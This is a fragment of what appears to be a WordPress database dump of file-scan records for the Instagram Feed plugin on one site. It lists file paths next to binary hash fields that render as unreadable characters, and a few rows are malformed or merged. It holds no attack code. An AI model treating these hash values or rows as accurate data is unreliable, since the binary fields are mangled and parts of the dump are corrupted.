0\0\0\0\0\0\0\0\0\0\0\0\0\0','jҰaW.','\0Sp2Sj (=! bȔ(ҹ','',0,'?'),('+}dS&k','wp-content/plugins/instagram-feed/admin/assets/img/oembeds-image-1@2x.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/oembeds-image-1@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&[z3\\#,=','8=ص!|ǫ^mN\'4','',0,'?'),('zǘNyUϳ','wp-content/plugins/instagram-feed/admin/assets/img/oembeds-image-2@2x.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/oembeds-image-2@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e-~LmALf9','C8Tx3d6\rkJv|éV9','',0,'?'),('اjؿ>cc','wp-content/plugins/instagram-feed/admin/assets/img/oembeds-image-3@2x.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/oembeds-image-3@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','49񙺊','1Pv\\@Gx2]0\0','',0,'?'),('I?2{`','wp-content/plugins/instagram-feed/admin/assets/img/oembeds-image-4@2x.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/oembeds-image-4@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','buy<\n$Ә\'','J?7l)UYNEaFB4&<','',0,'?'),('#D OVI0','wp-content/plugins/instagram-feed/admin/assets/img/rocket-icon.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/rocket-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\"hR[|獌V l','zw?מwh5!^-V ','',0,'?'),('z1Ax|~\'V.','wp-content/plugins/instagram-feed/admin/assets/img/rocket-icon.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/rocket-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','','',0,'?'),('nm] Vu','wp-content/plugins/instagram-feed/admin/assets/img/uncanny-automator-logo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/uncanny-automator-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h5D\n]N\0','(<>qʥf\n4-8Z.NaD','',0,'?'),('Wۥy[EZڞ','wp-content/plugins/instagram-feed/admin/assets/img/youtube-icon.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/youtube-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XZ8g\"/Vv','Pc`Tt;5E8:!ai\\','',0,'?'),('N|ɬӏ','wp-content/plugins/instagram-feed/admin/assets/js/about.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/js/about.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{<9GRX','p|j\nQã]\Ze.o3','',0,'?'),('+w>6ʼnK׫}','wp-content/plugins/instagram-feed/admin/assets/js/admin-notifications.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/js/admin-notifications.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':.O@_f',',^+]NTU\".ͫj=JB','',0,'?'),('>wA&','wp-content/plugins/instagram-feed/admin/assets/js/oembeds.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/js/oembeds.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\H1\"yE=','zY)7R0[,x[ZX,','',0,'?'),('sw>KR*7df9','wp-content/plugins/instagram-feed/admin/assets/js/settings.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/js/settings.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!هx{*0','SX]iiU.vQnW:','',0,'?'),('_0r3_\"bfy','wp-content/plugins/instagram-feed/admin/assets/js/support.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/js/support.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v?7(KW:5;p]','H)X!º` {X?^','',0,'?'),('\0/\nVj|','wp-content/plugins/instagram-feed/admin/builder/assets/css/builder.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/css/builder.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_I55j(Rh','7/gͦ~y5_1um','',0,'?'),('s\'b8`HÛ|','wp-content/plugins/instagram-feed/admin/builder/assets/css/global.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/css/global.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z=sW\'B.%G)P','}\nuR(u׺tt^7haa*$','',0,'?'),('V@ZIW','wp-content/plugins/instagram-feed/admin/builder/assets/css/preview.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/css/preview.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=\rՋl@\rӱ','G\nY7ԉ,yo\'O','',0,'?'),('^rDh䄰','wp-content/plugins/instagram-feed/admin/builder/assets/css/tooltipster.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/css/tooltipster.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?X&','Swwj-j&$f~:0)f','',0,'?'),('ؾJ`A+Ǵ㣨','wp-content/plugins/instagram-feed/admin/builder/assets/img/albums.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/albums.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1&~WT','K㐗Q5dՋhڳeWx0*5\"!','',0,'?'),('Sj5c0y','wp-content/plugins/instagram-feed/admin/builder/assets/img/allinoneseo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/allinoneseo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0~C,c8V','wp-content/plugins/instagram-feed/admin/builder/assets/img/dummy-lightbox.jpeg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/dummy-lightbox.jpeg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3o̸LLTT$','*=7Zed &/+ġ 8(f-','',0,'?'),('I;;NoѬ1','wp-content/plugins/instagram-feed/admin/builder/assets/img/dummylighbox.jpg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/dummylighbox.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cu%r`Y!_','ʼ\\Nf?ЭÍ&p','',0,'?'),(';\0Ag','wp-content/plugins/instagram-feed/admin/builder/assets/img/events.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/events.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Q ~K|sC','/H_\"vІRRBWi\0O','',0,'?'),('Fjt92m\\','wp-content/plugins/instagram-feed/admin/builder/assets/img/ext-featuredpost.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/ext-featuredpost.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3%I.LϽRDF','Zhe{ B0\\r','',0,'?'),('3Kڿ<}sq','wp-content/plugins/instagram-feed/admin/builder/assets/img/ext-reviews.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/ext-reviews.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9e^`x','xMz x!2r bc3pu;','',0,'?'),('A\0.@ ','wp-content/plugins/instagram-feed/admin/builder/assets/img/ext-singlealbum.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/ext-singlealbum.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T!âDA','\"*$mї^\"z2\"P5A','',0,'?'),('H6#jf^\\<','wp-content/plugins/instagram-feed/admin/builder/assets/img/ext-socialwall.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/ext-socialwall.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BcGK','B-MM}ZfB8 7*','',0,'?'),(')D;&B46rm ','wp-content/plugins/instagram-feed/admin/builder/assets/img/featuredpost.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/featuredpost.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Bd3]:fgw','EQ(4 $ 0nݡq','',0,'?'),('Au4i','wp-content/plugins/instagram-feed/admin/builder/assets/img/footer-social.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/footer-social.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SuwX','>EuLqx4\'ZOU0Uui','',0,'?'),('<','wp-content/plugins/instagram-feed/admin/builder/assets/img/instagram.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/instagram.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','npSؾ1%','Ǻ_]~Kx&CS!9α','',0,'?'),('wð2,e$G','wp-content/plugins/instagram-feed/admin/builder/assets/img/landscapeswelove.jpg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/landscapeswelove.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AA=zڶ~','Svʁjvɶr}wB1$','',0,'?'),('y+x!JJ-','wp-content/plugins/instagram-feed/admin/builder/assets/img/logo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?MX]JlR','',0,'?'),('0-@EW','wp-content/plugins/instagram-feed/admin/builder/assets/img/process-featured-post.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/process-featured-post.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':]X6 ss\'9sE~-','',0,'?'),('藉X% *','wp-content/plugins/instagram-feed/admin/builder/assets/img/success-banner.jpg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/success-banner.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oZt','>\rԾuzd!P{Pi8ȕP0up','',0,'?'),('V]q','wp-content/plugins/instagram-feed/admin/builder/assets/img/timeline.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/timeline.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'!Z|50F?#','&7i{أv7A\nRFe','',0,'?'),('=\rn 圫','wp-content/plugins/instagram-feed/admin/builder/assets/img/user.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/user.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϥkj\"$I','  f[=H\rA\"Ѹр','',0,'?'),('Yˋ(|):-;n','wp-content/plugins/instagram-feed/admin/builder/assets/img/videos.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/videos.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}}YMc>!x:','$̆=/2-KΫ\0yY','',0,'?'),('=X(ɫ','wp-content/plugins/instagram-feed/admin/builder/assets/img/waving-hand.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/waving-hand.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VwzWI V','eYf{\\djX\'s\nQ8\"., k','',0,'?'),('Q$u\"\n','wp-content/plugins/instagram-feed/admin/builder/assets/img/welcome-1.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/welcome-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p`H8,hÈ','_R/ʝ3t||Ϭh}(\\','',0,'?'),('j8AXzL','wp-content/plugins/instagram-feed/admin/builder/assets/img/welcome-2.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/welcome-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ZE\"\Z3','X[.?~(cɝ2v0UGd','',0,'?'),('Wv\nvN','wp-content/plugins/instagram-feed/admin/builder/assets/img/wpforms.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/wpforms.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hV^R\'J ','b #;|#ao˟-\Z1?A0!Rev','',0,'?'),('Re $)M\n+','wp-content/plugins/instagram-feed/admin/builder/assets/js/add-source.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/js/add-source.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˖@Ζ˼@','0\"!ʦg@?Vkob\"(l(V','',0,'?'),('6CC&[T7fq','wp-content/plugins/instagram-feed/admin/builder/assets/js/builder.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/js/builder.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D2KIE6za?','bÏ<Caveppe_','',0,'?'),('01Mua<,z3','wp-content/plugins/instagram-feed/admin/builder/assets/js/confirm-dialog.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/js/confirm-dialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$£CdXM~x65M','} ]\Z8j9GTx44}?X#z~','',0,'?'),('+.PW~Ʃ','wp-content/plugins/instagram-feed/admin/builder/assets/js/date_i18n.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/js/date_i18n.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5OrG/9k]R%|','*vmrUdJ %I','',0,'?'),('YCqqMr','wp-content/plugins/instagram-feed/admin/builder/assets/js/install-plugin-popup.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/js/install-plugin-popup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fcզ kNC_Y','x2ysbDc!t\'#լ','',0,'?'),('N uI?9.','wp-content/plugins/instagram-feed/admin/builder/assets/js/jquery.tooltipster.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/js/jquery.tooltipster.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';\0@@J','Wͫ=j>m \r늖S W\\/jF/=F@C','',0,'?'),('<8 ¢','wp-content/plugins/instagram-feed/admin/builder/assets/js/vue-color.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/js/vue-color.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' :cL}j_\Z\\','G\rڑn[B:Q}rxBTMi.','',0,'?'),('՝!lhkD','wp-content/plugins/instagram-feed/admin/builder/templates/builder.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_\07S6','j\rN_xuV\\C!g&','',0,'?'),('Ɩt?ۺ','wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/add-source.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/add-source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-yh','\r5y<&=,3iPHf%{,&d6','',0,'?'),('_4Ykz)W\r','wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/configure-features.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/configure-features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fܜUԹ}O,','(+( {1p}΋av(\rV','',0,'?'),(' =ձ;ww','wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/install-plugins.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/install-plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a^TKF#u6','~M7@m1\\:E4V\"','',0,'?'),('FRlPofN4','wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/success-page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/success-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+0 J','NZ} ]plLvI,fĆ͵','',0,'?'),('kb\Z^#','wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/welcome.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/welcome.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1tXdWhw gr1?','Ƽj1-TO+跣`\r4','',0,'?'),('DŽvVp,Z','wp-content/plugins/instagram-feed/admin/builder/templates/preview/error.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/preview/error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r1>ђ','m:㮛M4\\\0b5Đ{%cKt','',0,'?'),('Ӗ\"LZu`0,','wp-content/plugins/instagram-feed/admin/builder/templates/preview/header.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/preview/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q>7B1$M5','Auv\"R8fx-','',0,'?'),('\\\0߰Uv\0','wp-content/plugins/instagram-feed/admin/builder/templates/preview/light-box.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/preview/light-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' f{y[壍','Vaֵ?R?1C+%}','',0,'?'),('Y::,Y7Υ','wp-content/plugins/instagram-feed/admin/builder/templates/preview/theme-styles.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/preview/theme-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׮oFЙd;f','a5OY񠢴Kl2ij9','',0,'?'),('FS3J\nm)','wp-content/plugins/instagram-feed/admin/builder/templates/screens/customizer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/screens/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ob]:O[Am1a','AX<1\0\\2?(*:&`z','',0,'?'),('-U\n3\0.8+l','wp-content/plugins/instagram-feed/admin/builder/templates/screens/onboarding-wizard.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/screens/onboarding-wizard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$zڠ*p W{3','-ؽt|D٫?1\ZXX~6M','',0,'?'),('ƒNy֩ކ#to\n^','wp-content/plugins/instagram-feed/admin/builder/templates/screens/select-feed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/screens/select-feed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PvJPL^#w}\\','y޵ vs;ZGi5fF','',0,'?'),('r,1Lb{fh','wp-content/plugins/instagram-feed/admin/builder/templates/screens/welcome.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/screens/welcome.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r@xڀWRA','*gYh\nwa%P2Bj ?\n','',0,'?'),('jvGvBD','wp-content/plugins/instagram-feed/admin/builder/templates/sections/create-feed/multiple-sources-list.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/create-feed/multiple-sources-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^/ OK9I','^ Wغ TkDg=','',0,'?'),('Оtű','wp-content/plugins/instagram-feed/admin/builder/templates/sections/create-feed/multiple-sources.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/create-feed/multiple-sources.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9U3DX>S9','4TCm./xIf','',0,'?'),(' ^H)\Z\'','wp-content/plugins/instagram-feed/admin/builder/templates/sections/create-feed/single-public-hashtags.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/create-feed/single-public-hashtags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kIr= θCQ',' x+ >{%Н.70Ӓd?r','',0,'?'),('`ٽ$0\nF','wp-content/plugins/instagram-feed/admin/builder/templates/sections/create-feed/single-sources.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/create-feed/single-sources.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n*t\rYq','+%(f#՘\'Y?9 \\(34D','',0,'?'),('J\n |\n8n] P','wp-content/plugins/instagram-feed/admin/builder/templates/sections/customizer/preview.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/customizer/preview.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^\"Kedku ?>','ރ;ZU1J>\'5/hP,=w2+s','',0,'?'),(' Ms7SB','wp-content/plugins/instagram-feed/admin/builder/templates/sections/customizer/sidebar.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/customizer/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<<-tNkyZ','!t#Mbm/itrVJAv?','',0,'?'),('ɕ#eښ_','wp-content/plugins/instagram-feed/admin/builder/templates/sections/empty-state.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/empty-state.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&s.|ng ','BI\r5[ ׌W֯Tt-gK ɽ','',0,'?'),('H.il-\rf','wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds/feeds.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds/feeds.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',N-~ ~$e','Jdjix^nƴE@\0dM','',0,'?'),('gPdh J','wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds/instances.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds/instances.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b;s?Y[́QZe','lɖ $p+O0\\0&^o','',0,'?'),(' %\"Ԯ7','wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds/legacy-feeds.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds/legacy-feeds.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jh=0:','m_ \r{72ZМHPkM','',0,'?'),('+{*դ _D','wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds-list.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƫ3ѥ_\Za[','ԑbNY]Y/F̸I{V30&!','',0,'?'),('\rT7@\\J','wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds-type.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' LNtNѰ˺','\"}/RQ]OJWK z̃+\0?','',0,'?'),('7κqŰI%Wzu','wp-content/plugins/instagram-feed/admin/builder/templates/sections/footer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.5\rDWl:',']CyJg0{#jv|(','',0,'?'),('.o\Z=;','wp-content/plugins/instagram-feed/admin/builder/templates/sections/header.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wXoʲ nl','t\'P5uqi#⯧/=>Bl~','',0,'?'),('b*̙6x','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/add-source-popup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/add-source-popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nx%@pxA','Zz-Ƌ{n*l%~q ','',0,'?'),('O0-U7\nJC','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/confirm-dialog-popup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/confirm-dialog-popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gn<Ia','wjEQLfѳP:~_[0','',0,'?'),('䶷BQmЃC[','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/embed-popup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/embed-popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A}szgf5٤\n','a Zvb&8{ّ','',0,'?'),('q\"z2x׃Jz','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/extensions-popup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/extensions-popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sGf,>^7v<|',']DfA}\Zr4V@2_Qʪ','',0,'?'),(']a@60Z(','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/feedtypes-customizer-popup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/feedtypes-customizer-popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I` AڭS])u','{ 2Uӓ\'#5`emfkWcYM','',0,'?'),('M3GP?$]\">)','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/feedtypes-popup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/feedtypes-popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 19ʦqL1Q','=*`xFD`q^8c\0(','',0,'?'),('2m\r YCgYj','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/install-plugin-popup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/install-plugin-popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p aR\Z','',0,'?'),('dwkԀNqQ','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/source-instances.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/source-instances.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mпV4,:J','|\\KOE!x3륶V5%m','',0,'?'),('R]ޮdjb}\r','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/sources-list-popup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/sources-list-popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͋6%bK','r̒|;dS\r}ػ@','',0,'?'),('< Yz ','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/temp-login-about.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/temp-login-about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\8q','D`cv}>:0_{&úCIb','',0,'?'),('Y\'xdfI','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/uncanny-automator-integraion.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/uncanny-automator-integraion.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(g+e30F\Z[','(j\0\0\rP$(LRꉯq','',0,'?'),('̣Qg˱W','wp-content/plugins/instagram-feed/admin/builder/templates/sections/select-source.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/select-source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' PVC5y/','ZgQcyfPX}b2Eau','',0,'?'),('LCfB\n','wp-content/plugins/instagram-feed/admin/builder/templates/wizard.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/wizard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\ZUM; J','0̦J.9C\Z{','gfO=p>OV`i\"]W\Z\r','',0,'?'),('m9Jr 